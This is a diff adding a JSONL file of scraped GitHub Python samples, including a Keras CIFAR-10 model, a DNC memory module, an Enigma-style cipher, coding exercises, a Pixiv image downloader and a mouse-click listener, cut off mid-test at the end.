diff --git "a/1562.jsonl" "b/1562.jsonl" new file mode 100644--- /dev/null +++ "b/1562.jsonl" @@ -0,0 +1,963 @@ +{"seq_id":"18132718192","text":"from keras.models import Sequential\nfrom keras.layers.core import Dense, Flatten, Activation, Dropout\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\nfrom keras.utils import np_utils\nfrom keras.optimizers import RMSprop\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.datasets import cifar10\n\nfrom matplotlib import pyplot as plt\n\nIMG_CHANNELS = 3\nIMG_ROWS = 32\nIMG_COLS = 32\n\nBATCH_SIZE = 128\nEPOCHS = 20\nVALIDATION_SPLIT = 0.2\nVERBOSE = 1\nNB_CLASSES = 10\nOPTIM = RMSprop()\n\n(X_train, y_train), (X_test, y_test) = cifar10.load_data()\nX_train = X_train.astype('float32')\nX_test = X_test.astype('float32')\nX_train /= 255\nX_test /= 255\n\ny_train = np_utils.to_categorical(y_train, NB_CLASSES)\ny_test = np_utils.to_categorical(y_test, NB_CLASSES)\n\ndatagen = ImageDataGenerator(rotation_range=40, width_shift_range=0.2, height_shift_range=0.2, zoom_range=0.2, horizontal_flip=True)\n\nmodel = Sequential()\nmodel.add(Conv2D(32, kernel_size=3, input_shape=(IMG_ROWS, IMG_COLS, IMG_CHANNELS), padding='same'))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Conv2D(64, kernel_size=3, padding='same'))\nmodel.add(Activation('relu'))\nmodel.add(Conv2D(64, kernel_size=3, padding='same'))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Flatten())\nmodel.add(Dense(512))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(NB_CLASSES))\nmodel.add(Activation('softmax'))\n\nmodel.compile(loss='categorical_crossentropy', optimizer=OPTIM, metrics=['accuracy'])\n\ndatagen.fit(X_train)\nhistory = model.fit_generator(datagen.flow(X_train, y_train, batch_size=BATCH_SIZE),\n samples_per_epoch=X_train.shape[0],\n epochs=EPOCHS,\n validation_steps=VALIDATION_SPLIT,\n verbose=VERBOSE)\n\n\nprint('Testing...')\nscore = model.evaluate(X_test, y_test, batch_size=BATCH_SIZE, verbose=VERBOSE)\nprint(\"\\nTest score:\", score[0])\nprint('Test accuracy:', score[1])\n\n#save model\nmodel_json = model.to_json()\nopen('../../../cache/cifar10_architecture.json', 'w').write(model_json)\nmodel.save_weights('../../../cache/cifar10_weights.h5', overwrite=True)\n\n# list all data in history\nprint(history.history.keys())\n# summarize history for accuracy\nplt.plot(history.history['acc'])\nplt.plot(history.history['val_acc'])\nplt.title('model accuracy')\nplt.ylabel('accuracy')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\nplt.show()\n# summarize history for loss\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\nplt.show()\n\n\n\n","repo_name":"chen0040/pydl-hands-on","sub_path":"pydl/keras/dcnn/cifar10/convnet_cifar10_data_aug.py","file_name":"convnet_cifar10_data_aug.py","file_ext":"py","file_size_in_byte":2811,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"9707638125","text":"# Desenvolva um programa que recebe do usuário nome completo e ano de nascimento que seja entre 1922 e 2021.\n# A partir dessas informações, o sistema mostrará o nome do usuário e a idade que completou, ou completará, no ano atual (2022).\n# Caso o usuário não digite um número ou apareça um inválido 
no campo do ano, o sistema informará o erro e continuará perguntando até que um valor correto seja preenchido.\n# Resposta:\nwhile True:\n nome = str(input(\"digite seu nome\"))\n nasceu = int(input(\"digite o ano que voce nasceu\"))\n if nasceu >= 1922 and nasceu <= 2021:\n idade = 2022 - nasceu\n print(nome, idade)\n break\n\n else:\n print(\n \"ano de nascimento deve ser maior que 1922 e menor que 2021, tente de novo\")\n","repo_name":"Vitor-Mateus-Dev/Proz","sub_path":"Atividades/nome_idade.py","file_name":"nome_idade.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2764780477","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport collections\nimport sonnet as snt\nimport tensorflow as tf\n\nimport addressing\nimport util\n\nAccessState = collections.namedtuple('AccessState', (\n 'memory', 'read_weights', 'write_weights', 'linkage', 'usage'))\n\n\ndef _erase_and_write(memory, address, reset_weights, values):\n \"\"\"Module to erase and write in the external memory.\n\n Erase operation:\n M_t'(i) = M_{t-1}(i) * (1 - w_t(i) * e_t)\n\n Add operation:\n M_t(i) = M_t'(i) + w_t(i) * a_t\n\n where e are the reset_weights, w the write weights and a the values.\n\n Args:\n memory: 3-D tensor of shape `[batch_size, memory_size, word_size]`.\n address: 3-D tensor `[batch_size, num_writes, memory_size]`.\n reset_weights: 3-D tensor `[batch_size, num_writes, word_size]`.\n values: 3-D tensor `[batch_size, num_writes, word_size]`.\n\n Returns:\n 3-D tensor of shape `[batch_size, num_writes, word_size]`.\n \"\"\"\n with tf.name_scope('erase_memory', values=[memory, address, reset_weights]):\n expand_address = tf.expand_dims(address, 3)\n reset_weights = tf.expand_dims(reset_weights, 2)\n weighted_resets = expand_address * reset_weights\n reset_gate = tf.reduce_prod(1 - weighted_resets, [1])\n memory *= reset_gate\n\n with tf.name_scope('additive_write', values=[memory, address, values]):\n add_matrix = tf.matmul(address, values, adjoint_a=True)\n memory += add_matrix\n\n return memory\n\n\nclass MemoryAccess(snt.RNNCore):\n \"\"\"Access module of the Differentiable Neural Computer.\n\n This memory module supports multiple read and write heads. 
It makes use of:\n\n * `addressing.TemporalLinkage` to track the temporal ordering of writes in\n memory for each write head.\n * `addressing.FreenessAllocator` for keeping track of memory usage, where\n usage increase when a memory location is written to, and decreases when\n memory is read from that the controller says can be freed.\n\n Write-address selection is done by an interpolation between content-based\n lookup and using unused memory.\n\n Read-address selection is done by an interpolation of content-based lookup\n and following the link graph in the forward or backwards read direction.\n \"\"\"\n\n def __init__(self,\n memory_size=128,\n word_size=20,\n num_reads=1,\n num_writes=1,\n name='memory_access'):\n \"\"\"Creates a MemoryAccess module.\n\n Args:\n memory_size: The number of memory slots (N in the DNC paper).\n word_size: The width of each memory slot (W in the DNC paper)\n num_reads: The number of read heads (R in the DNC paper).\n num_writes: The number of write heads (fixed at 1 in the paper).\n name: The name of the module.\n \"\"\"\n super(MemoryAccess, self).__init__(name=name)\n self._memory_size = memory_size\n self._word_size = word_size\n self._num_reads = num_reads\n self._num_writes = num_writes\n\n self._write_content_weights_mod = addressing.CosineWeights(\n num_writes, word_size, name='write_content_weights')\n self._read_content_weights_mod = addressing.CosineWeights(\n num_reads, word_size, name='read_content_weights')\n\n self._linkage = addressing.TemporalLinkage(memory_size, num_writes)\n self._freeness = addressing.Freeness(memory_size)\n\n def _build(self, inputs, prev_state):\n \"\"\"Connects the MemoryAccess module into the graph.\n\n Args:\n inputs: tensor of shape `[batch_size, input_size]`. This is used to\n control this access module.\n prev_state: Instance of `AccessState` containing the previous state.\n\n Returns:\n A tuple `(output, next_state)`, where `output` is a tensor of shape\n `[batch_size, num_reads, word_size]`, and `next_state` is the new\n `AccessState` named tuple at the current time t.\n \"\"\"\n inputs = self._read_inputs(inputs)\n\n # Update usage using inputs['free_gate'] and previous read & write weights.\n usage = self._freeness(\n write_weights=prev_state.write_weights,\n free_gate=inputs['free_gate'],\n read_weights=prev_state.read_weights,\n prev_usage=prev_state.usage)\n\n # Write to memory.\n write_weights = self._write_weights(inputs, prev_state.memory, usage)\n memory = _erase_and_write(\n prev_state.memory,\n address=write_weights,\n reset_weights=inputs['erase_vectors'],\n values=inputs['write_vectors'])\n\n linkage_state = self._linkage(write_weights, prev_state.linkage)\n\n # Read from memory.\n read_weights = self._read_weights(\n inputs,\n memory=memory,\n prev_read_weights=prev_state.read_weights,\n link=linkage_state.link)\n read_words = tf.matmul(read_weights, memory)\n\n return (read_words, AccessState(\n memory=memory,\n read_weights=read_weights,\n write_weights=write_weights,\n linkage=linkage_state,\n usage=usage))\n\n def _read_inputs(self, inputs):\n \"\"\"Applies transformations to `inputs` to get control for this module.\"\"\"\n\n def _linear(first_dim, second_dim, name, activation=None):\n \"\"\"Returns a linear transformation of `inputs`, followed by a reshape.\"\"\"\n linear = snt.Linear(first_dim * second_dim, name=name)(inputs)\n if activation is not None:\n linear = activation(linear, name=name + '_activation')\n return tf.reshape(linear, [-1, first_dim, second_dim])\n\n # v_t^i - The vectors 
to write to memory, for each write head `i`.\n write_vectors = _linear(self._num_writes, self._word_size, 'write_vectors')\n\n # e_t^i - Amount to erase the memory by before writing, for each write head.\n erase_vectors = _linear(self._num_writes, self._word_size, 'erase_vectors',\n tf.sigmoid)\n\n # f_t^j - Amount that the memory at the locations read from at the previous\n # time step can be declared unused, for each read head `j`.\n free_gate = tf.sigmoid(\n snt.Linear(self._num_reads, name='free_gate')(inputs))\n\n # g_t^{a, i} - Interpolation between writing to unallocated memory and\n # content-based lookup, for each write head `i`. Note: `a` is simply used to\n # identify this gate with allocation vs writing (as defined below).\n allocation_gate = tf.sigmoid(\n snt.Linear(self._num_writes, name='allocation_gate')(inputs))\n\n # g_t^{w, i} - Overall gating of write amount for each write head.\n write_gate = tf.sigmoid(\n snt.Linear(self._num_writes, name='write_gate')(inputs))\n\n # \\pi_t^j - Mixing between \"backwards\" and \"forwards\" positions (for\n # each write head), and content-based lookup, for each read head.\n num_read_modes = 1 + 2 * self._num_writes\n read_mode = snt.BatchApply(tf.nn.softmax)(\n _linear(self._num_reads, num_read_modes, name='read_mode'))\n\n # Parameters for the (read / write) \"weights by content matching\" modules.\n write_keys = _linear(self._num_writes, self._word_size, 'write_keys')\n write_strengths = snt.Linear(self._num_writes, name='write_strengths')(\n inputs)\n\n read_keys = _linear(self._num_reads, self._word_size, 'read_keys')\n read_strengths = snt.Linear(self._num_reads, name='read_strengths')(inputs)\n\n result = {\n 'read_content_keys': read_keys,\n 'read_content_strengths': read_strengths,\n 'write_content_keys': write_keys,\n 'write_content_strengths': write_strengths,\n 'write_vectors': write_vectors,\n 'erase_vectors': erase_vectors,\n 'free_gate': free_gate,\n 'allocation_gate': allocation_gate,\n 'write_gate': write_gate,\n 'read_mode': read_mode,\n }\n return result\n\n def _write_weights(self, inputs, memory, usage):\n \"\"\"Calculates the memory locations to write to.\n\n This uses a combination of content-based lookup and finding an unused\n location in memory, for each write head.\n\n Args:\n inputs: Collection of inputs to the access module, including controls for\n how to chose memory writing, such as the content to look-up and the\n weighting between content-based and allocation-based addressing.\n memory: A tensor of shape `[batch_size, memory_size, word_size]`\n containing the current memory contents.\n usage: Current memory usage, which is a tensor of shape `[batch_size,\n memory_size]`, used for allocation-based addressing.\n\n Returns:\n tensor of shape `[batch_size, num_writes, memory_size]` indicating where\n to write to (if anywhere) for each write head.\n \"\"\"\n with tf.name_scope('write_weights', values=[inputs, memory, usage]):\n # c_t^{w, i} - The content-based weights for each write head.\n write_content_weights = self._write_content_weights_mod(\n memory, inputs['write_content_keys'],\n inputs['write_content_strengths'])\n\n # a_t^i - The allocation weights for each write head.\n write_allocation_weights = self._freeness.write_allocation_weights(\n usage=usage,\n write_gates=(inputs['allocation_gate'] * inputs['write_gate']),\n num_writes=self._num_writes)\n\n # Expands gates over memory locations.\n allocation_gate = tf.expand_dims(inputs['allocation_gate'], -1)\n write_gate = 
tf.expand_dims(inputs['write_gate'], -1)\n\n      # w_t^{w, i} - The write weightings for each write head.\n      return write_gate * (allocation_gate * write_allocation_weights +\n                           (1 - allocation_gate) * write_content_weights)\n\n  def _read_weights(self, inputs, memory, prev_read_weights, link):\n    \"\"\"Calculates read weights for each read head.\n\n    The read weights are a combination of following the link graphs in the\n    forward or backward directions from the previous read position, and doing\n    content-based lookup. The interpolation between these different modes is\n    done by `inputs['read_mode']`.\n\n    Args:\n      inputs: Controls for this access module. This contains the content-based\n          keys to lookup, and the weightings for the different read modes.\n      memory: A tensor of shape `[batch_size, memory_size, word_size]`\n          containing the current memory contents to do content-based lookup.\n      prev_read_weights: A tensor of shape `[batch_size, num_reads,\n          memory_size]` containing the previous read locations.\n      link: A tensor of shape `[batch_size, num_writes, memory_size,\n          memory_size]` containing the temporal write transition graphs.\n\n    Returns:\n      A tensor of shape `[batch_size, num_reads, memory_size]` containing the\n      read weights for each read head.\n    \"\"\"\n    with tf.name_scope(\n        'read_weights', values=[inputs, memory, prev_read_weights, link]):\n      # c_t^{r, i} - The content weightings for each read head.\n      content_weights = self._read_content_weights_mod(\n          memory, inputs['read_content_keys'], inputs['read_content_strengths'])\n\n      # Calculates f_t^i and b_t^i.\n      forward_weights = self._linkage.directional_read_weights(\n          link, prev_read_weights, forward=True)\n      backward_weights = self._linkage.directional_read_weights(\n          link, prev_read_weights, forward=False)\n\n      backward_mode = inputs['read_mode'][:, :, :self._num_writes]\n      forward_mode = (\n          inputs['read_mode'][:, :, self._num_writes:2 * self._num_writes])\n      content_mode = inputs['read_mode'][:, :, 2 * self._num_writes]\n\n      read_weights = (\n          tf.expand_dims(content_mode, 2) * content_weights + tf.reduce_sum(\n              tf.expand_dims(forward_mode, 3) * forward_weights, 2) +\n          tf.reduce_sum(tf.expand_dims(backward_mode, 3) * backward_weights, 2))\n\n      return read_weights\n\n  @property\n  def state_size(self):\n    \"\"\"Returns a tuple of the shape of the state tensors.\"\"\"\n    return AccessState(\n        memory=tf.TensorShape([self._memory_size, self._word_size]),\n        read_weights=tf.TensorShape([self._num_reads, self._memory_size]),\n        write_weights=tf.TensorShape([self._num_writes, self._memory_size]),\n        linkage=self._linkage.state_size,\n        usage=self._freeness.state_size)\n\n  @property\n  def output_size(self):\n    \"\"\"Returns the output shape.\"\"\"\n    return tf.TensorShape([self._num_reads, self._word_size])\n","repo_name":"huseinzol05/Stock-Prediction-Models","sub_path":"deep-learning/access.py","file_name":"access.py","file_ext":"py","file_size_in_byte":12286,"program_lang":"python","lang":"en","doc_type":"code","stars":6916,"dataset":"github-code","pt":"48"}
+{"seq_id":"11679074571","text":"alfabeto = \"abcdefghijklmnopqrstuvwxyz\"\ndef cesarecifra(lettera,chiave):\n    indice = alfabeto.index(lettera)\n    indice = (indice + chiave) % len(alfabeto)\n    return alfabeto[indice]\ndef scambiatore(lettera):\n    indice = alfabeto.index(lettera)\n    # the modulo keeps the index in range ('a' at index 0 would otherwise map to 26)\n    indice = (len(alfabeto) - indice) % len(alfabeto)\n    return alfabeto[indice]\n\n#keys\nprint(\"enter the keys of the three rotors\")\nchiave1 = int(input());\nchiave2 = int(input());\nchiave3 = int(input());\n\n#plugboard\nquadro = list(\"abcdefghijklmnopqrstuvwxyz\")\nprint(\"enter 6 pairs of letters\")\nfor i in range(0,6):\n    coppia = input()\n    lettera1 = coppia[0]\n    lettera2 = coppia[1]\n    indice1 = quadro.index(lettera1)\n    indice2 = quadro.index(lettera2)\n    tmp = quadro[indice1] \n    quadro[indice1] = quadro[indice2]\n    quadro[indice2] = tmp\n\n#encrypt the phrase\nprint(\"enter the phrase\")\nfrase = input()\ncifrata = \"\"\nfor i in range(0,len(frase)):\n    #plugboard\n    indice = alfabeto.index(frase[i])\n    uscita = quadro[indice]\n\n    #rotors\n    uscita_r1 = cesarecifra(uscita,chiave1)\n    uscita_r2 = cesarecifra(uscita_r1,chiave2)\n    uscita_r3 = cesarecifra(uscita_r2,chiave3)\n\n    #reflector\n    uscita_rif = scambiatore(uscita_r3)\n\n    #rotors (backwards)\n    uscita_r4 = cesarecifra(uscita_rif,-chiave1)\n    uscita_r5 = cesarecifra(uscita_r4,-chiave2)\n    uscita_r6 = cesarecifra(uscita_r5,-chiave3)\n\n    #plugboard (backwards)\n    indice = alfabeto.index(uscita_r6)\n    uscita = quadro[indice]\n\n    cifrata = cifrata + uscita\n    \n    #rotor stepping after each letter\n    chiave1 = chiave1 + 1\n    if chiave1 > len(alfabeto):\n        chiave1 = 0\n    chiave2 = chiave2 + 1\n    if chiave2 > len(alfabeto):\n        chiave2 = 0\n    chiave3 = chiave3 + 1\n    if chiave3 > len(alfabeto):\n        chiave3 = 0\nprint(cifrata)\n","repo_name":"DiniSauri/dinicode","sub_path":"crittografia/enigma.py","file_name":"enigma.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"12739752325","text":"from typing import List\r\n\r\n\r\nclass Solution:\r\n\r\n    MAX_WEIGHT = 500\r\n\r\n    def shipWithinDays(self, weights: List[int], D: int) -> int:\r\n        low, high = 0, len(weights) * Solution.MAX_WEIGHT\r\n        possible = self.possible\r\n        while low < high:\r\n            mid = low + (high - low) // 2\r\n            if possible(weights, D, mid):\r\n                high = mid\r\n            else:\r\n                low = mid + 1\r\n        return high\r\n\r\n    def possible(self, weights: List[int], D: int, capacity: int) -> bool:\r\n        ship = 0\r\n        current = 0\r\n        for weight in weights:\r\n            if current + weight > capacity:\r\n                ship += 1\r\n                if ship > D:\r\n                    return False\r\n                current = weight\r\n                if current > capacity:\r\n                    return False\r\n            else:\r\n                current += weight\r\n        if current > 0:\r\n            ship += 1\r\n        return ship <= D\r\n","repo_name":"sandychn/LeetCode-Solutions","sub_path":"Algorithms/BinarySearch/1011-capacity-to-ship-packages-within-d-days.py","file_name":"1011-capacity-to-ship-packages-within-d-days.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"21404489871","text":"import asyncio\nimport aio_pika\n\n\nasync def main(loop):\n    connection = await aio_pika.connect_robust(\n        \"amqp://guest:guest@127.0.0.1/\", loop=loop\n    )\n\n    async with connection:\n        routing_key = \"test_queue\"","repo_name":"Skylar-Kerzner/when-the","sub_path":"when_the/lib/producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"6686383459","text":"from langchain.document_loaders import UnstructuredURLLoader\nimport session_info\n\nfrom chatbot_settings import ChatBotSettings\nfrom langchain.chat_models import ChatOpenAI\nfrom langchain.schema import (\n    SystemMessage,\n    HumanMessage,\n    AIMessage\n)\n\nchatbotSettings = ChatBotSettings()\n\nsession_info.show()\n\nurls = [\n    
\"https://www.understandingwar.org/backgrounder/russian-offensive-campaign-assessment-february-8-2023\",\n \"https://www.understandingwar.org/backgrounder/russian-offensive-campaign-assessment-february-9-2023\",\n]\n\nprint(urls)\n\nloader = UnstructuredURLLoader(urls=urls)\n\nprint(loader)\n\ndata = loader.load()\n\nprint(data)\n\n","repo_name":"ggrow3/ExtensibleChatBot","sub_path":"misc_url_loader.py","file_name":"misc_url_loader.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"18027130245","text":"# import package\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom sklearn.decomposition import PCA\n\n# import datasets\nfrom sklearn.datasets import load_breast_cancer\ncancer=load_breast_cancer()\nprint(cancer.keys())\n\ndf=pd.DataFrame(cancer['data'],columns=cancer['feature_names'])\nprint(df.head(5))\n\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.preprocessing import StandardScaler\nscaler=StandardScaler()\nscaler.fit(df)\nStandardScaler(copy=True, with_mean=True, with_std=True)\nscaled_data=scaler.transform(df)\nprint(scaled_data)\n\npca=PCA(n_components=2)\npca.fit(scaled_data)\n\nx_pca=pca.transform(scaled_data)\nprint(scaled_data.shape)\n\nprint(x_pca.shape)\n\nscaled_data\n\nprint(x_pca)\n\nplt.figure(figsize=(8,6))\nplt.scatter(x_pca[:,0],x_pca[:,1],c=cancer['target'])\nplt.xlabel('First principle component')\nplt.ylabel('Second principle component')\nplt.show()\n\n","repo_name":"kecoaktempur/Machine-Learning-Prak-Smt4","sub_path":"TM 5 - Extraction and Selection Feature/week 5.py","file_name":"week 5.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44194000486","text":"from models.event import EventModel\nfrom db import db\n\n\nclass OrdersModel(db.Model):\n __tablename__ = 'orders'\n id = db.Column(db.Integer, primary_key=True)\n username = db.Column(db.String(30), db.ForeignKey('accounts.username'), nullable=False)\n id_event = db.Column(db.Integer, nullable=False)\n tickets_bought = db.Column(db.Integer, nullable=False)\n\n def json(self):\n event = EventModel.find_by_id(self.id_event)\n return {\n \"Id\": self.id_event,\n \"Username\": self.username,\n \"Event_name\": event.name,\n \"Event_date\": event.date,\n \"Event_city\": event.city,\n \"Tickets_bought\": self.tickets_bought\n }\n\n def save_to_db(self):\n if self.id and OrdersModel.query.get(self.id):\n db.session.commit()\n else:\n db.session.add(self)\n db.session.commit()\n\n\n def delete_from_db(self):\n if self.id and OrdersModel.query.get(self.id):\n db.session.delete(self)\n db.session.commit()\n else:\n raise Exception(\"Warning not in DB\")\n\n @classmethod\n def find_by_username(cls, username):\n if username:\n return OrdersModel.query.filter_by(username=username).all()\n else:\n return None\n\n @classmethod\n def find_all(cls):\n return OrdersModel.query.all()\n\n def __init__(self, id_event, tickets_bought):\n self.id_event = id_event\n self.tickets_bought = tickets_bought\n","repo_name":"aldakata/SD_p2","sub_path":"backend/models/orders.py","file_name":"orders.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42113390315","text":"# Write a function called list_manipulator which receives a list of numbers as first parameter and different amount of\r\n# 
other parameters. The second parameter might be \"add\" or \"remove\". The third parameter might be \"beginning\" or \"end\".\r\n# There might or might not be any other parameters (numbers):\r\n# •\tIn case of \"add\" and \"beginning\", add the given numbers to the beginning of the given list of numbers and\r\n# return the new list\r\n# •\tIn case of \"add\" and \"end\", add the given numbers to the end of the given list of numbers and return the new list\r\n# •\tIn case of \"remove\" and \"beginning\"\r\n# o\tIf there is another parameter (number), remove that amount of numbers from the beginning of the list of numbers.\r\n# o\tIf there are no other parameters, remove only the first element of the list.\r\n# o\tFinaly, return the new list\r\n# •\tIn case of \"remove\" and \"end\"\r\n# o\tIf there is another parameter (number), remove that amount of numbers from the end of the list of numbers.\r\n# o\tOtherwise if there are no other parameters, remove only the last element of the list.\r\n# o\tFinaly, return the new list\r\n# For more clarifications, see the examples below.\r\n\r\n\r\nfrom collections import deque\r\n\r\n\r\ndef list_manipulator(current_lst, operation, position, *args):\r\n new_list = deque(current_lst)\r\n\r\n if operation == 'add':\r\n if position == 'beginning':\r\n if len(args) > 0:\r\n new_list = deque(args) + new_list\r\n\r\n elif position == 'end':\r\n if len(args) > 0:\r\n new_list += deque(args)\r\n\r\n elif operation == 'remove':\r\n if position == 'beginning':\r\n if 0 <= len(args) <= 1:\r\n n = args[0] if len(args) == 1 else 1\r\n fn = new_list.popleft if position == 'beginning' else new_list.pop\r\n for _ in range(n):\r\n fn()\r\n\r\n elif position == 'end':\r\n if 0 <= len(args) <= 1:\r\n n = args[0] if len(args) == 1 else 1\r\n fn = new_list.popleft if position == 'beginning' else new_list.pop\r\n for _ in range(n):\r\n fn()\r\n\r\n return list(new_list)\r\n\r\n\r\nprint(list_manipulator([1, 2, 3], \"remove\", \"end\"))\r\nprint(list_manipulator([1, 2, 3], \"remove\", \"beginning\"))\r\nprint(list_manipulator([1, 2, 3], \"add\", \"beginning\", 20))\r\nprint(list_manipulator([1, 2, 3], \"add\", \"end\", 30))\r\nprint(list_manipulator([1, 2, 3], \"remove\", \"end\", 2))\r\nprint(list_manipulator([1, 2, 3], \"remove\", \"beginning\", 2))\r\nprint(list_manipulator([1, 2, 3], \"add\", \"beginning\", 20, 30, 40))\r\nprint(list_manipulator([1, 2, 3], \"add\", \"end\", 30, 40, 50))\r\n","repo_name":"AlexanderIvanofff/Python-OOP","sub_path":"Multidimensional Lists/list_manipulator.py","file_name":"list_manipulator.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41494184528","text":"from pynput import mouse\n\ndef on_click(x, y,button,pressed):\n if pressed:\n print(str(button)+\" pressed(\"+str(x)+\", \"+str(y)+\")\")\n else:\n print(str(button)+\" released at (\"+str(x)+\", \"+str(y)+\")\")\n\nwith mouse.Listener(\n on_click=on_click) as listener:\n\n listener.join()\n\n\nlistener = mouse.Listener(\n #on_press=on_press,\n #on_release=on_release\n on_click=on_click)\nlistener.start()","repo_name":"erdebankadas/Automated_mouse_monitor","sub_path":"mouse.py","file_name":"mouse.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35123766875","text":"import requests\nimport re\nimport html\nfrom pipe_fn import e\nimport json\nimport os.path\nimport bs4\n\nimg_url 
= \"https://i.pximg.net/img-original/img/{date}/{pid}_p{page}.{ext}\"\nartworks_url = \"https://www.pixiv.net/artworks/{pid}\"\n\n\ndef get_info(illust_id):\n url = artworks_url.format(pid=illust_id)\n response = requests.get(url)\n soup = bs4.BeautifulSoup(response.content)\n content = json.loads(soup.find(\"meta\", id=\"meta-preload-data\")[\"content\"])\n return {\n \"id\": content[\"illust\"][illust_id][\"id\"],\n \"title\": content[\"illust\"][illust_id][\"title\"],\n \"description\": content[\"illust\"][illust_id][\"description\"],\n \"illustType\": content[\"illust\"][illust_id][\"illustType\"],\n \"xRestrict\": content[\"illust\"][illust_id][\"xRestrict\"],\n \"tags\": content[\"illust\"][illust_id][\"tags\"][\"tags\"]\n | e / map @ (lambda t: t[\"tag\"])\n | e / list,\n \"pageCount\": content[\"illust\"][illust_id][\"pageCount\"],\n \"bookmarkCount\": content[\"illust\"][illust_id][\"bookmarkCount\"],\n \"likeCount\": content[\"illust\"][illust_id][\"likeCount\"],\n \"viewCount\": content[\"illust\"][illust_id][\"viewCount\"],\n }\n\n\ndef dict2cookie(cookie):\n return (\n list(cookie.items())\n | e / map @ (lambda x: str(x[0]) + \"=\" + str(x[1]))\n | e / \";\".join\n )\n\n\ndef get_image_ext(date, pid):\n url = img_url.format(date=date, pid=pid, page=0, ext=\"jpg\")\n x = requests.head(url, headers={\"referer\": url})\n if x.status_code == 200:\n return \"jpg\"\n else:\n # normally there are only two formats\n return \"png\"\n\n\ndef get_newest_followed_illusts(cookie, page_id):\n def extract_date(illust):\n url = illust[\"url\"]\n date = re.compile(\n r\"img-master/img/(\\d{4}/\\d{2}/\\d{2}/\\d{2}/\\d{2}/\\d{2})/\"\n ).findall(url)[0]\n return date\n\n patt = re.compile(\n '
'\n )\n url = f\"https://www.pixiv.net/bookmark_new_illust.php?p={page_id}\"\n response = requests.get(\n url, params={\"p\": page_id}, headers={\"cookie\": dict2cookie(cookie)}\n )\n result = patt.findall(response.content.decode())\n return (\n result[0]\n | e / html.unescape\n | e / json.loads\n | e / filter @ (lambda x: x[\"illustType\"] != \"2\") # ignore animate\n | e / map @ (lambda x: (x[\"illustId\"], extract_date(x), x[\"pageCount\"]))\n | e / map @ (lambda x: (x[0], x[1], x[2], get_image_ext(x[1], x[0])))\n | e / list\n )\n\n\ndef download_newest_followed_illusts(cookie, latest_pid, dest):\n lst = []\n k = 1\n p = get_newest_followed_illusts(cookie, k)\n ret = p | e / map @ (lambda x: int(x[0])) | e / max\n p = p | e / filter @ (lambda x: int(x[0]) > latest_pid) | e / list\n while p:\n download_list(p, dest)\n k += 1\n p = (\n get_newest_followed_illusts(cookie, k)\n | e / filter @ (lambda x: int(x[0]) > latest_pid)\n | e / list\n )\n return (ret, lst)\n\n\ndef download_list(lst, dest, filtering=lambda x: True):\n for illust in lst:\n if not filtering(illust):\n continue\n # illust :: (pid, date, page count, ext)\n for page in range(0, int(illust[2])):\n name = \"{}_p{}.{}\".format(illust[0], page, illust[3])\n with open(os.path.join(dest, name), \"wb\") as f:\n url = img_url.format(\n pid=illust[0], date=illust[1], ext=illust[3], page=page\n )\n print(\"Downloading {}\".format(url))\n response = requests.get(url, headers={\"referer\": url})\n print(\"Response: {}\".format(response.status_code))\n if response.status_code != 200:\n continue\n f.write(response.content)\n return True\n\n\ndef main(\n cookie={\n \"device_token\": \"\",\n \"PHPSESSID\": \"\",\n },\n latest_pid=\"81515705\",\n dest=\"D:\\\\palette\\\\Sync\\\\Devices\",\n):\n if os.path.isfile(\"prop/latest_pid\"):\n with open(\"prop/latest_pid\", \"r\") as f:\n latest_pid = f.readline()\n latest_pid, _ = download_newest_followed_illusts(\n cookie, int(latest_pid), \"D:\\\\palette\\\\Sync\\\\Devices\"\n )\n with open(\"prop/latest_pid\", \"w\") as f:\n f.write(str(latest_pid))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"paletteOvO/CodeColle","sub_path":"Python/waifu/pixiv.py","file_name":"pixiv.py","file_ext":"py","file_size_in_byte":4406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34273977045","text":"import unittest\nfrom house_scrapping.remax_url_scrapper import RemaxURLScraper\n\nclass TestRemaxWebScraper(unittest.TestCase):\n def test_set_search_param(self):\n \"\"\"Test if the set_search_param method correctly updates search parameters.\"\"\"\n scraper = RemaxURLScraper()\n scraper.set_search_param(\"rooms\", 3)\n self.assertEqual(scraper.search_params[\"rooms\"], 3)\n\n def 